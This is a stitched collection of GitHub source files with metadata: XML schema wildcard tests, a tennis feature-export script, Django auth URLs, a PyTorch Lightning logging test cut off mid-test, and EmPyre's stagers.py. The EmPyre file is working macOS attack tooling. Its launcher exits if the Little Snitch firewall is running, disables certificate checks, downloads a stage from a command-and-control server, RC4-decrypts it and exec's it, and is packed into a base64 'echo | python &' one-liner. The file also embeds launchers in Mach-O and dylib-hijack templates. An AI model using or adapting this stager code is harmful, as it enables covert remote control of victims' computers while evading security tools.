options = self.help_check(options, "--include-unused")
|
{
"content_hash": "a21a37cd49739a20c8c119ccc7908ad7",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 71,
"avg_line_length": 31.244897959183675,
"alnum_prop": 0.6557805355976486,
"repo_name": "dbbhattacharya/kitsune",
"id": "8024b4185f7899ebcdd70a2e170ee891436256b0",
"size": "1664",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "vendor/packages/translate-toolkit/translate/convert/test_tiki2po.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "2694"
},
{
"name": "CSS",
"bytes": "276585"
},
{
"name": "HTML",
"bytes": "600145"
},
{
"name": "JavaScript",
"bytes": "800276"
},
{
"name": "Python",
"bytes": "2762831"
},
{
"name": "Shell",
"bytes": "6720"
},
{
"name": "Smarty",
"bytes": "1752"
}
],
"symlink_target": ""
}
|
'''
This program sets up the feature input files for the HDF5 converter from S2S from VEN
Run feature_combine.py first
Uses splits from split_dir
Uses individual numpy (.npy) features from npy_path
Writes out tennis_allframes_tennis002_layer_split.txt annotation files ready for HDF5 conversion
'''
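# Each emitted annotation line (see the frame loop below) has the form
#   <clip_id>_frame_<n>,<feat_0>,<feat_1>,...
# i.e. one comma-separated feature row per video frame, keyed by the clip id
# and a 1-based frame index.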
import numpy as np
import os
from os import listdir
from os.path import isfile, join
import utilities.paths as paths
DRIVE = paths.get_drive()
MODELS = ['MVCD003_02']
LAYERS = ['fc6', 'fc7','pool5']
LAYERS = ['fc7']
# LAYERS = ['pool5']
CLASSES = ['Point']
SPLITS = ['Train','Val','Test']
SPLIT = 'S005'
for _class in CLASSES:
for model in MODELS:
for layer in LAYERS:
print '*******'*20
print layer
save_path = "%sDATASETS/VIDEO/TENNIS/FEATURES/CLASSES/%s/%s/%s/txt2/" % (DRIVE, _class, model, layer)
if not os.path.exists(save_path):
os.makedirs(save_path)
with open("%sall.txt" % (save_path), 'a') as f_all:
# Read Splits File
for _split in SPLITS:
print _split
with open("%sDATASETS/VIDEO/TENNIS/SPLITS/%s/CLASSES/%s_splits.txt" % (DRIVE, SPLIT, _class), 'r') as f:
files = f.readlines()
do = []
for file in files:
if _split.lower() in file.split("\t")[1]:
do.append(file.split("\t")[0])
npy_path = "%sDATASETS/VIDEO/TENNIS/FEATURES/CLASSES/%s/%s/%s/npy/" % (DRIVE, _class, model, layer)
for file in do:
npy_feats = np.load(npy_path + file + '.npy')
# tmp = []
# for i in range(len(npy_feats)):
# tmp.append(npy_feats[i])
# npy_feats = tmp
###############################if int(file[2:])<200: # edit to make dataset size 200 max
print file
# print np.shape(npy_feats)
for frame in range(np.shape(npy_feats)[0]):
out_str = file + '_frame_' + str(frame+1) + ',' + ",".join(map(str, npy_feats[frame])) + "\n"
# print out_str
f_all.writelines(out_str)
with open("%s%s.txt" % (save_path, _split.lower()), 'a') as f_split:
f_split.writelines(out_str)
|
{
"content_hash": "d83f95ec576f77388be54b5f43efd156",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 124,
"avg_line_length": 38.45454545454545,
"alnum_prop": 0.48857368006304175,
"repo_name": "HaydenFaulkner/phd",
"id": "3ba143181a066afe84c3fa5d42556d70ec7c7272",
"size": "2538",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "processing/feature/feats_npy2txt.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1243227"
}
],
"symlink_target": ""
}
|
import logging
if __name__ == '__main__':
logging.basicConfig()
_log = logging.getLogger(__name__)
import pyxb.binding.generate
import pyxb.utils.domutils
from xml.dom import Node
import os.path
schema_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../schemas/test-wildcard.xsd'))
code = pyxb.binding.generate.GeneratePython(schema_location=schema_path)
rv = compile(code, 'test', 'exec')
eval(rv)
from pyxb.exceptions_ import *
import unittest
def nc_not (ns_or_absent):
return ( pyxb.xmlschema.structures.Wildcard.NC_not, ns_or_absent )
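# In these tests a namespace constraint is one of: the NC_any token ("any
# namespace"), an (NC_not, ns_or_absent) pair as built above, or a set of
# namespace names where None stands for the absent namespace.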
class TestIntensionalSet (unittest.TestCase):
def testTest (self):
ns = 'URN:namespace'
not_nc = nc_not(ns)
self.assertTrue(isinstance(not_nc, tuple))
self.assertEqual(2, len(not_nc))
self.assertEqual(pyxb.xmlschema.structures.Wildcard.NC_not, not_nc[0])
self.assertEqual(ns, not_nc[1])
def testUnion_1 (self):
UNION = pyxb.xmlschema.structures.Wildcard.IntensionalUnion
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertEqual(nc_any, UNION([ nc_any, nc_any ]))
self.assertEqual(nc_not(ns1), UNION([ nc_not(ns1), nc_not(ns1) ]))
self.assertEqual(set([ns1]), UNION([ set([ns1]), set([ns1]) ]))
def testUnion_2 (self):
UNION = pyxb.xmlschema.structures.Wildcard.IntensionalUnion
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertEqual(nc_any, UNION([ nc_any, set([ns1]) ]))
self.assertEqual(nc_any, UNION([ nc_any, nc_not(ns1) ]))
self.assertEqual(nc_any, UNION([ nc_any, nc_not(None) ]))
def testUnion_3 (self):
UNION = pyxb.xmlschema.structures.Wildcard.IntensionalUnion
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertEqual(set([ns1, ns2]), UNION([set([ns1]), set([ns2])]))
self.assertEqual(set([None, ns1]), UNION([set([None]), set([ns1])]))
self.assertEqual(set([None]), UNION([set([None]), set([None])]))
def testUnion_4 (self):
UNION = pyxb.xmlschema.structures.Wildcard.IntensionalUnion
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertEqual(nc_not(None), UNION([nc_not(ns1), nc_not(ns2)]))
self.assertEqual(nc_not(None), UNION([nc_not(ns1), nc_not(None)]))
def testUnion_5 (self):
UNION = pyxb.xmlschema.structures.Wildcard.IntensionalUnion
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertEqual(nc_any, UNION([nc_not(ns1), set([ns1, None])])) # 5.1
self.assertEqual(nc_not(None), UNION([nc_not(ns1), set([ns1, ns2])])) # 5.2
self.assertRaises(SchemaValidationError, UNION, [nc_not(ns1), set([None, ns2])]) # 5.3
self.assertEqual(nc_not(ns1), UNION([nc_not(ns1), set([ns2])])) # 5.4
def testUnion_6 (self):
UNION = pyxb.xmlschema.structures.Wildcard.IntensionalUnion
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertEqual(nc_any, UNION([nc_not(None), set([ns1, ns2, None])])) # 6.1
self.assertEqual(nc_not(None), UNION([nc_not(None), set([ns1, ns2])])) # 6.2
def testIntersection_1 (self):
ISECT = pyxb.xmlschema.structures.Wildcard.IntensionalIntersection
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertEqual(nc_any, ISECT([ nc_any, nc_any ]))
self.assertEqual(nc_not(ns1), ISECT([ nc_not(ns1), nc_not(ns1) ]))
self.assertEqual(set([ns1]), ISECT([ set([ns1]), set([ns1]) ]))
def testIntersection_2 (self):
ISECT = pyxb.xmlschema.structures.Wildcard.IntensionalIntersection
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertEqual(set([ns1]), ISECT([ nc_any, set([ns1]) ]))
self.assertEqual(nc_not(ns1), ISECT([ nc_any, nc_not(ns1) ]))
self.assertEqual(nc_not(None), ISECT([ nc_any, nc_not(None) ]))
def testIntersection_3 (self):
ISECT = pyxb.xmlschema.structures.Wildcard.IntensionalIntersection
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertEqual(set([ns2]), ISECT([nc_not(ns1), set([ns1, ns2, None])]))
self.assertEqual(set([ns2]), ISECT([nc_not(ns1), set([ns1, ns2])]))
self.assertEqual(set([ns2]), ISECT([nc_not(ns1), set([ns2])]))
def testIntersection_4 (self):
ISECT = pyxb.xmlschema.structures.Wildcard.IntensionalIntersection
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertEqual(set([ns2]), ISECT([set([ns1, ns2]), set([ns2, None])]))
self.assertEqual(set([ns2, None]), ISECT([set([None, ns1, ns2]), set([ns2, None])]))
self.assertEqual(set([]), ISECT([set([ns1]), set([ns2, None])]))
self.assertEqual(set([]), ISECT([set([ns1]), set([ns2, ns1]), set([ns2, None])]))
self.assertEqual(set([ns1]), ISECT([set([ns1, None]), set([None, ns2, ns1]), set([ns1, ns2])]))
def testIntersection_5 (self):
ISECT = pyxb.xmlschema.structures.Wildcard.IntensionalIntersection
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertRaises(SchemaValidationError, ISECT, [nc_not(ns1), nc_not(ns2)])
def testIntersection_6 (self):
ISECT = pyxb.xmlschema.structures.Wildcard.IntensionalIntersection
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertEqual(nc_not(ns1), ISECT([nc_not(ns1), nc_not(None)]))
class TestWildcard (unittest.TestCase):
def setUp (self):
# Hide the warning about failure to convert DOM node {}third
# to a binding
self.__basis_log = logging.getLogger('pyxb.binding.basis')
self.__basis_loglevel = self.__basis_log.level
self.__basis_log.setLevel(logging.ERROR)
def tearDown (self):
pyxb.RequireValidWhenParsing(True)
self.__basis_log.level = self.__basis_loglevel
def testElement (self):
# NB: Test on CTD, not element
self.assertTrue(wrapper_._HasWildcardElement)
xmls = '<wrapper><first/><second/><third/></wrapper>'
doc = pyxb.utils.domutils.StringToDOM(xmls)
instance = wrapper.createFromDOM(doc.documentElement)
self.assertTrue(isinstance(instance.wildcardElements(), list))
self.assertEqual(1, len(instance.wildcardElements()))
# Alternative parser path
instance = CreateFromDocument(xmls)
self.assertTrue(isinstance(instance.wildcardElements(), list))
self.assertEqual(1, len(instance.wildcardElements()))
def _validateWildcardWrappingRecognized (self, instance):
self.assertTrue(isinstance(instance.wildcardElements(), list))
self.assertEqual(1, len(instance.wildcardElements()))
dom = instance.wildcardElements()[0]
self.assertTrue(isinstance(dom, Node))
self.assertEqual(Node.ELEMENT_NODE, dom.nodeType)
self.assertEqual('third', dom.nodeName)
self.assertEqual(1, len(dom.childNodes))
cdom = dom.firstChild
self.assertTrue(isinstance(cdom, Node))
self.assertEqual(Node.ELEMENT_NODE, cdom.nodeType)
self.assertEqual('selt', cdom.nodeName)
ccdom = cdom.firstChild
self.assertTrue(isinstance(ccdom, Node))
self.assertEqual(Node.TEXT_NODE, ccdom.nodeType)
self.assertEqual('text', ccdom.data)
def testWildcardWrappingRecognized (self):
# NB: Test on CTD, not element
self.assertTrue(wrapper_._HasWildcardElement)
xmls = '<wrapper><first/><second/><third><selt>text</selt></third></wrapper>'
doc = pyxb.utils.domutils.StringToDOM(xmls)
instance = wrapper.createFromDOM(doc.documentElement)
self._validateWildcardWrappingRecognized(instance)
# Alternative parser path
instance = CreateFromDocument(xmls)
self._validateWildcardWrappingRecognized(instance)
def testMultiElement (self):
tested_overmax = False
for rep in range(0, 6):
xmls = '<wrapper><first/><second/>%s</wrapper>' % (''.join(rep * ['<third/>']),)
doc = pyxb.utils.domutils.StringToDOM(xmls)
if 3 >= rep:
instance = wrapper.createFromDOM(doc.documentElement)
self.assertTrue(isinstance(instance.wildcardElements(), list))
self.assertEqual(rep, len(instance.wildcardElements()))
for i in range(0, rep):
self.assertEqual('third', instance.wildcardElements()[i].nodeName)
else:
tested_overmax = True
self.assertRaises(UnrecognizedContentError, wrapper.createFromDOM, doc.documentElement)
self.assertTrue(tested_overmax)
def testAttribute (self):
# NB: Test on CTD, not element
self.assertTrue(isinstance(wrapper_._AttributeWildcard, pyxb.binding.content.Wildcard))
xmls = '<wrapper myattr="true" auxattr="somevalue"/>'
doc = pyxb.utils.domutils.StringToDOM(xmls)
instance = wrapper.createFromDOM(doc.documentElement)
self.assertTrue(isinstance(instance.wildcardAttributeMap(), dict))
self.assertEqual(1, len(instance.wildcardAttributeMap()))
self.assertEqual('somevalue', instance.wildcardAttributeMap()['auxattr'])
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "3a9880f50c30a5851a4ccdcd7c995807",
"timestamp": "",
"source": "github",
"line_count": 220,
"max_line_length": 103,
"avg_line_length": 45.013636363636365,
"alnum_prop": 0.6368777138240937,
"repo_name": "CantemoInternal/pyxb",
"id": "46216176a251d2994755fe786372dc86a5ef17bf",
"size": "9927",
"binary": false,
"copies": "2",
"ref": "refs/heads/next",
"path": "tests/drivers/test-wildcard.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "383"
},
{
"name": "Python",
"bytes": "1935375"
},
{
"name": "Shell",
"bytes": "27215"
}
],
"symlink_target": ""
}
|
"""
URL patterns for the views included in ``django.contrib.auth``.
Including these URLs (via the ``include()`` directive) will set up the
following patterns based at whatever URL prefix they are included
under:
* User login at ``login/``.
* User logout at ``logout/``.
* The two-step password change at ``password/change/`` and
``password/change/done/``.
* The four-step password reset at ``password/reset/``,
``password/reset/confirm/``, ``password/reset/complete/`` and
``password/reset/done/``.
The default registration backend already has an ``include()`` for
these URLs, so under the default setup it is not necessary to manually
include these views. Other backends may or may not include them;
consult a specific backend's documentation for details.
"""
from django.conf.urls import include
from django.conf.urls import url
from django.core.urlresolvers import reverse_lazy
from django.contrib.auth import views as auth_views
urlpatterns = [
url(r'^login/$',
auth_views.login,
{'template_name': 'registration/login.html'},
name='auth_login'),
url(r'^logout/$',
auth_views.logout,
{'template_name': 'registration/logout.html'},
name='auth_logout'),
url(r'^password/change/$',
auth_views.password_change,
{'post_change_redirect': reverse_lazy('auth_password_change_done')},
name='auth_password_change'),
url(r'^password/change/done/$',
auth_views.password_change_done,
name='auth_password_change_done'),
url(r'^password/reset/$',
auth_views.password_reset,
{'post_reset_redirect': reverse_lazy('auth_password_reset_done')},
name='auth_password_reset'),
url(r'^password/reset/complete/$',
auth_views.password_reset_complete,
name='auth_password_reset_complete'),
url(r'^password/reset/done/$',
auth_views.password_reset_done,
name='auth_password_reset_done'),
]
from django import get_version
from distutils.version import LooseVersion
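# Django >= 1.6 switched the password-reset confirm URL from a base36 uid
# (uidb36) to a base64 uid (uidb64), hence the two variants below.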
if (LooseVersion(get_version()) >= LooseVersion('1.6')):
urlpatterns += [
url(r'^password/reset/confirm/(?P<uidb64>[0-9A-Za-z_\-]+)/(?P<token>.+)/$',
auth_views.password_reset_confirm,
{'post_reset_redirect': reverse_lazy('auth_password_reset_complete')},
name='auth_password_reset_confirm')
]
else:
urlpatterns += [
url(r'^password/reset/confirm/(?P<uidb36>[0-9A-Za-z]{1,13})-(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',
auth_views.password_reset_confirm,
{'post_reset_redirect': reverse_lazy('auth_password_reset_complete')},
name='auth_password_reset_confirm')
]
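# Hedged usage sketch (added for illustration): wiring these patterns into a
# project URLconf. The dotted path matches this file's location in the
# package; the '^accounts/' prefix is an assumption, not part of this module.
#
#     from django.conf.urls import include, url
#
#     urlpatterns = [
#         url(r'^accounts/', include('registration.auth_urls')),
#     ]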
|
{
"content_hash": "2cf2d64d9414cf144aeb5214942bdbdb",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 138,
"avg_line_length": 43.81818181818182,
"alnum_prop": 0.5245998814463545,
"repo_name": "dresl/django18-bootstrap",
"id": "3ff5d3d3291704ef9714f74e7c99d874e77f18d1",
"size": "3374",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "registration/auth_urls.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "124"
},
{
"name": "HTML",
"bytes": "17738"
},
{
"name": "JavaScript",
"bytes": "1125"
},
{
"name": "Python",
"bytes": "89405"
},
{
"name": "Shell",
"bytes": "286"
}
],
"symlink_target": ""
}
|
"""
Stager handling functionality for EmPyre.
"""
import fnmatch
import imp
import http
import helpers
import encryption
import os
import base64
class Stagers:
def __init__(self, MainMenu, args):
self.mainMenu = MainMenu
# pull the database connection object out of the main menu
self.conn = self.mainMenu.conn
self.args = args
# stager module format:
# [ ("stager_name", instance) ]
self.stagers = {}
# pull out the code install path from the database config
cur = self.conn.cursor()
cur.execute("SELECT install_path FROM config")
self.installPath = cur.fetchone()[0]
cur.execute("SELECT default_profile FROM config")
self.userAgent = (cur.fetchone()[0]).split("|")[1]
cur.close()
# pull out staging information from the main menu
self.stage0 = self.mainMenu.stage0
self.stage1 = self.mainMenu.stage1
self.stage2 = self.mainMenu.stage2
self.load_stagers()
def load_stagers(self):
"""
        Load stagers from the installation path, under "lib/stagers/*".
"""
rootPath = self.installPath + 'lib/stagers/'
pattern = '*.py'
for root, dirs, files in os.walk(rootPath):
for filename in fnmatch.filter(files, pattern):
filePath = os.path.join(root, filename)
# extract just the module name from the full path
stagerName = filePath.split("/lib/stagers/")[-1][0:-3]
# instantiate the module and save it to the internal cache
self.stagers[stagerName] = imp.load_source(stagerName, filePath).Stager(self.mainMenu, [])
def set_stager_option(self, option, value):
"""
Sets an option for all stagers.
"""
for name, stager in self.stagers.iteritems():
for stagerOption, stagerValue in stager.options.iteritems():
if stagerOption == option:
stager.options[option]['Value'] = str(value)
def generate_stager(self, server, key, profile, encrypt=True, encode=False):
"""
Generate the Python stager that will perform
key negotiation with the server and kick off the agent.
"""
# TODO: implement for Python
# read in the stager base
f = open(self.installPath + "/data/agent/stager.py")
stager = f.read()
f.close()
stager = helpers.strip_python_comments(stager)
# first line of randomized text to change up the ending RC4 string
randomHeader = "%s='%s'\n" % (helpers.random_string(), helpers.random_string())
stager = randomHeader + stager
if server.endswith("/"):
server = server[0:-1]
# # patch the server and key information
stager = stager.replace("REPLACE_SERVER", server)
stager = stager.replace("REPLACE_STAGING_KEY", key)
stager = stager.replace("REPLACE_PROFILE", profile)
stager = stager.replace("index.jsp", self.stage1)
stager = stager.replace("index.php", self.stage2)
# # base64 encode the stager and return it
# if encode:
# return ""
if encrypt:
# return an encrypted version of the stager ("normal" staging)
# return encryption.xor_encrypt(stager, key)
return encryption.rc4(key, stager)
else:
            # otherwise return the unencrypted stager
return stager
def generate_stager_hop(self, server, key, profile, encrypt=True, encode=True):
"""
Generate the Python stager for hop.php redirectors that
will perform key negotiation with the server and kick off the agent.
"""
# read in the stager base
f = open(self.installPath + "./data/agent/stager_hop.py")
stager = f.read()
f.close()
stager = helpers.strip_python_comments(stager)
# first line of randomized text to change up the ending RC4 string
randomHeader = "%s='%s'\n" % (helpers.random_string(), helpers.random_string())
stager = randomHeader + stager
# patch the server and key information
stager = stager.replace("REPLACE_SERVER", server)
stager = stager.replace("REPLACE_STAGING_KEY", key)
stager = stager.replace("REPLACE_PROFILE", profile)
stager = stager.replace("index.jsp", self.stage1)
stager = stager.replace("index.php", self.stage2)
# # base64 encode the stager and return it
# if encode:
# return ""
if encrypt:
# return an encrypted version of the stager ("normal" staging)
# return encryption.xor_encrypt(stager, key)
return encryption.rc4(key, stager)
else:
            # otherwise return the unencrypted stager
return stager
def generate_agent(self, delay, jitter, profile, killDate, workingHours, lostLimit):
"""
Generate "standard API" functionality, i.e. the actual agent.py that runs.
This should always be sent over encrypted comms.
"""
f = open(self.installPath + "./data/agent/agent.py")
code = f.read()
f.close()
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
b64DefaultPage = base64.b64encode(http.default_page())
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace('profile = "/admin/get.php,/news.asp,/login/process.jsp|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultPage = base64.b64decode("")', 'defaultPage = base64.b64decode("%s")' % (b64DefaultPage))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
            code = code.replace('workingHours = ""', 'workingHours = "%s"' % (workingHours))
return code
def generate_launcher_uri(self, server, encode=True, pivotServer="", hop=False):
"""
Generate a base launcher URI.
This is used in the management/psinject module.
"""
if hop:
# generate the base64 encoded information for the hop translation
checksum = "?" + helpers.encode_base64(server + "&" + self.stage0)
else:
# get a valid staging checksum uri
checksum = self.stage0
if pivotServer != "":
checksum += "?" + helpers.encode_base64(pivotServer)
if server.count("/") == 2 and not server.endswith("/"):
server += "/"
return server + checksum
def generate_launcher(self, listenerName, encode=True, userAgent="default", littlesnitch='True'):
"""
Generate the initial Python 'download cradle' with a specified
c2 server and a valid HTTP checksum.
listenerName -> a name of a validly registered listener
userAgent -> "default" uses the UA from the default profile in the database
"none" sets no user agent
any other text is used as the user-agent
"""
# if we don't have a valid listener, return nothing
if not self.mainMenu.listeners.is_listener_valid(listenerName):
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
# extract the staging information from this specified listener
(server, stagingKey, pivotServer, hop) = self.mainMenu.listeners.get_stager_config(listenerName)
# if UA is 'default', use the UA from the default profile in the database
if userAgent.lower() == "default":
userAgent = self.userAgent
# get the launching stage0 URI
stage0uri = self.generate_launcher_uri(server, encode, pivotServer, hop)
# adopted from MSF's python meterpreter staging
# https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/python/reverse_http.rb
# first line of randomized text to change up the ending RC4 string
launcherBase = "%s='%s'\n" % (helpers.random_string(), helpers.random_string())
if "https" in stage0uri:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
launcherBase += "import sys, urllib2;"
try:
if littlesnitch.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n"
launcherBase += "out = ps.stdout.read()\n"
launcherBase += "ps.stdout.close()\n"
launcherBase += "if re.search(\"Little Snitch\", out):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stagger: " + str(e)
print helpers.color(p, color="Yellow")
launcherBase += "o=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener']).build_opener();"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "o.addheaders=[('User-Agent',UA)];"
launcherBase += "a=o.open('%s').read();" % (stage0uri)
launcherBase += "key='%s';" % (stagingKey)
# RC4 decryption
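        # (standard RC4: the key-scheduling algorithm first, then the PRGA
        # keystream XORed over the response -- the symmetric counterpart of
        # encryption.rc4() used server-side)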
launcherBase += "S,j,out=range(256),0,[]\n"
launcherBase += "for i in range(256):\n"
launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in a:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
# base64 encode the stager and return it
if encode:
launchEncoded = base64.b64encode(launcherBase)
# launcher = "python -c \"import sys,base64;exec(base64.b64decode('%s'));\"" %(launchEncoded)
launcher = "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python &" % (launchEncoded)
return launcher
else:
return launcherBase
def generate_hop_php(self, server, resources):
"""
Generates a hop.php file with the specified target server
and resource URIs.
"""
# read in the hop.php base
f = open(self.installPath + "/data/misc/hop.php")
hop = f.read()
f.close()
# make sure the server ends with "/"
if not server.endswith("/"):
server += "/"
# patch in the server and resources
hop = hop.replace("REPLACE_SERVER", server)
hop = hop.replace("REPLACE_RESOURCES", resources)
return hop
def generate_macho(self, launcherCode):
"""
        Generates a Mach-O binary with an embedded Python interpreter that runs the launcher code.
"""
import macholib.MachO
MH_EXECUTE = 2
f = open(self.installPath + "/data/misc/machotemplate", 'rb')
macho = macholib.MachO.MachO(f.name)
if int(macho.headers[0].header.filetype) != MH_EXECUTE:
print helpers.color("[!] Macho binary template is not the correct filetype")
return ""
cmds = macho.headers[0].commands
for cmd in cmds:
count = 0
if int(cmd[count].cmd) == macholib.MachO.LC_SEGMENT_64:
count += 1
if cmd[count].segname.strip('\x00') == '__TEXT' and cmd[count].nsects > 0:
count += 1
for section in cmd[count]:
if section.sectname.strip('\x00') == '__cstring':
offset = int(section.offset)
placeHolderSz = int(section.size) - 13
template = f.read()
f.close()
if placeHolderSz and offset:
launcher = launcherCode + "\x00" * (placeHolderSz - len(launcherCode))
patchedMachO = template[:offset]+launcher+template[(offset+len(launcher)):]
return patchedMachO
else:
print helpers.color("[!] Unable to patch MachO binary")
def generate_dylib(self, launcherCode, arch, hijacker):
"""
        Generates a dylib with an embedded Python interpreter that runs the launcher code when loaded into an application.
"""
import macholib.MachO
MH_DYLIB = 6
if hijacker.lower() == 'true':
if arch == 'x86':
f = open(self.installPath + "/data/misc/hijackers/template.dylib", "rb")
else:
f = open(self.installPath + "/data/misc/hijackers/template64.dylib", "rb")
else:
if arch == 'x86':
f = open(self.installPath + "/data/misc/templateLauncher.dylib", "rb")
else:
f = open(self.installPath + "/data/misc/templateLauncher64.dylib", "rb")
macho = macholib.MachO.MachO(f.name)
if int(macho.headers[0].header.filetype) != MH_DYLIB:
print helpers.color("[!] Dylib template is not the correct filetype")
return ""
cmds = macho.headers[0].commands
for cmd in cmds:
count = 0
if int(cmd[count].cmd) == macholib.MachO.LC_SEGMENT_64 or int(cmd[count].cmd) == macholib.MachO.LC_SEGMENT:
count += 1
if cmd[count].segname.strip('\x00') == '__TEXT' and cmd[count].nsects > 0:
count += 1
for section in cmd[count]:
if section.sectname.strip('\x00') == '__cstring':
offset = int(section.offset)
placeHolderSz = int(section.size) - 52
template = f.read()
f.close()
if placeHolderSz and offset:
launcher = launcherCode + "\x00" * (placeHolderSz - len(launcherCode))
patchedDylib = template[:offset]+launcher+template[(offset+len(launcher)):]
return patchedDylib
else:
print helpers.color("[!] Unable to patch dylib")
|
{
"content_hash": "3ab1efd50cffa62e45db2d08cf8639a3",
"timestamp": "",
"source": "github",
"line_count": 392,
"max_line_length": 185,
"avg_line_length": 38.05357142857143,
"alnum_prop": 0.5769256552926192,
"repo_name": "EmpireProject/EmPyre",
"id": "c5b7e9705ed30eb8a32a19fb1fe7ade2b0caf1c9",
"size": "14917",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "lib/common/stagers.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1966"
},
{
"name": "Objective-C",
"bytes": "2664"
},
{
"name": "PHP",
"bytes": "2563"
},
{
"name": "Python",
"bytes": "1142712"
},
{
"name": "Ruby",
"bytes": "4105"
},
{
"name": "Shell",
"bytes": "2490"
}
],
"symlink_target": ""
}
|
"""
Test logging in the evaluation loop
"""
import collections
import itertools
from unittest import mock
from unittest.mock import call
import numpy as np
import pytest
import torch
from pytorch_lightning import callbacks, Trainer
from pytorch_lightning.loggers import TensorBoardLogger
from tests.helpers import BoringModel, RandomDataset
def test__validation_step__log(tmpdir):
"""
Tests that validation_step can log
"""
class TestModel(BoringModel):
def training_step(self, batch, batch_idx):
out = super().training_step(batch, batch_idx)
self.log("a", out["loss"], on_step=True, on_epoch=True)
self.log("a2", 2)
return out
def validation_step(self, batch, batch_idx):
out = super().validation_step(batch, batch_idx)
self.log("b", out["x"], on_step=True, on_epoch=True)
return out
model = TestModel()
model.validation_step_end = None
model.validation_epoch_end = None
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=2,
limit_val_batches=2,
max_epochs=2,
log_every_n_steps=1,
weights_summary=None,
)
trainer.fit(model)
assert set(trainer.logged_metrics) == {"a2", "a_step", "a_epoch", "b_step", "b_epoch", "epoch"}
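    # note the suffixing rule: a metric logged with both on_step=True and
    # on_epoch=True is exposed to the loggers as <name>_step and <name>_epoch,
    # while callback_metrics additionally keeps the unsuffixed <name>.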
    # we don't want to enable val metrics during steps, because that is not something users should do on purpose.
    # deliberately DO NOT allow b_step... it's silly to monitor val step metrics
assert set(trainer.callback_metrics) == {"a", "a2", "b", "a_epoch", "b_epoch", "a_step"}
def test__validation_step__epoch_end__log(tmpdir):
"""
Tests that validation_epoch_end can log
"""
class TestModel(BoringModel):
def training_step(self, batch, batch_idx):
out = super().training_step(batch, batch_idx)
self.log("a", out["loss"])
self.log("b", out["loss"], on_step=True, on_epoch=True)
return out
def validation_step(self, batch, batch_idx):
out = super().validation_step(batch, batch_idx)
self.log("c", out["x"])
self.log("d", out["x"], on_step=True, on_epoch=True)
return out
def validation_epoch_end(self, outputs):
self.log("g", torch.tensor(2, device=self.device), on_epoch=True)
model = TestModel()
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=2,
limit_val_batches=2,
max_epochs=2,
log_every_n_steps=1,
weights_summary=None,
)
trainer.fit(model)
# make sure all the metrics are available for loggers
